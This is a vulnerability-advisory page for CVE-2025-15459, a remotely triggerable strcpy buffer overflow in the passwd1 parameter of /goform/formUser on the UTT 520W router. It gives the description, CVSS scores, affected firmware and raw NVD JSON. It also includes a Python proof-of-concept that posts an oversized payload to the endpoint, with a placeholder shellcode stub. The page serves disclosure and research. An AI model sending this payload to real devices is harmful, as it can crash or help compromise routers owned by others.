Security Vulnerability Report
中文
CVE-2025-15459 CVSS 8.8 HIGH

CVE-2025-15459

Published: 2026-01-05 06:16:03
Last Modified: 2026-01-12 21:11:12
Source: [email protected]

Description

A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. Affected by this issue is the function strcpy of the file /goform/formUser. Such manipulation of the argument passwd1 leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:520w_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:* - NOT VULNERABLE
UTT 进取 520W 1.7.7-180627

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-15459 PoC - UTT 进取 520W Buffer Overflow Target: /goform/formUser, parameter: passwd1 """ import requests import sys def exploit_buffer_overflow(target_url, target_ip): """ Exploit the buffer overflow vulnerability in strcpy function Args: target_url: Base URL of the target router target_ip: Target IP address """ # Construct the vulnerable endpoint endpoint = f"{target_url}/goform/formUser" # Create overflow payload (length > buffer size) # Typical buffer size is around 256-512 bytes overflow_length = 1024 overflow_payload = "A" * overflow_length # Construct the POST data data = { "passwd1": overflow_payload, "passwd": "admin" } print(f"[*] Sending exploit payload to {endpoint}") print(f"[*] Payload length: {overflow_length} bytes") try: response = requests.post(endpoint, data=data, timeout=10) print(f"[*] Response status: {response.status_code}") print(f"[*] Response length: {len(response.content)} bytes") # Check if exploit was successful if response.status_code == 200: print("[+] Exploit sent successfully") print("[!] Note: Actual exploitation requires specific return address") print("[!] Modify payload to include shellcode for RCE") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False return True def generate_shellcode(): """ Generate shellcode for remote code execution Replace with actual MIPS shellcode for the target device """ # Placeholder for MIPS shellcode # In real exploitation, use architecture-specific shellcode shellcode = b"\x90" * 100 # NOP sled shellcode += b"\x00" * 50 # Padding return shellcode if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_ip> <password>") print(f"Example: {sys.argv[0]} 192.168.1.1 admin") sys.exit(1) target_ip = sys.argv[1] password = sys.argv[2] target_url = f"http://{target_ip}" print("=" * 60) print("CVE-2025-15459 - UTT 进取 520W Buffer Overflow Exploit") print("=" * 60) exploit_buffer_overflow(target_url, target_ip)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15459", "sourceIdentifier": "[email protected]", "published": "2026-01-05T06:16:03.273", "lastModified": "2026-01-12T21:11:11.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. Affected by this issue is the function strcpy of the file /goform/formUser. Such manipulation of the argument passwd1 leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:520w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-180627", "matchCriteriaId": "1ED9CE5B-AC0E-4C53-A084-7777D5050400"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DD42AC5F-531F-40FC-BD78-D20F298AF79A"}]}]}], "references": [{"url": "https://github.com/cymiao1978/cve/blob/main/new/22.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/new/22.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339495", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339495", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.725816", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/new/22.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.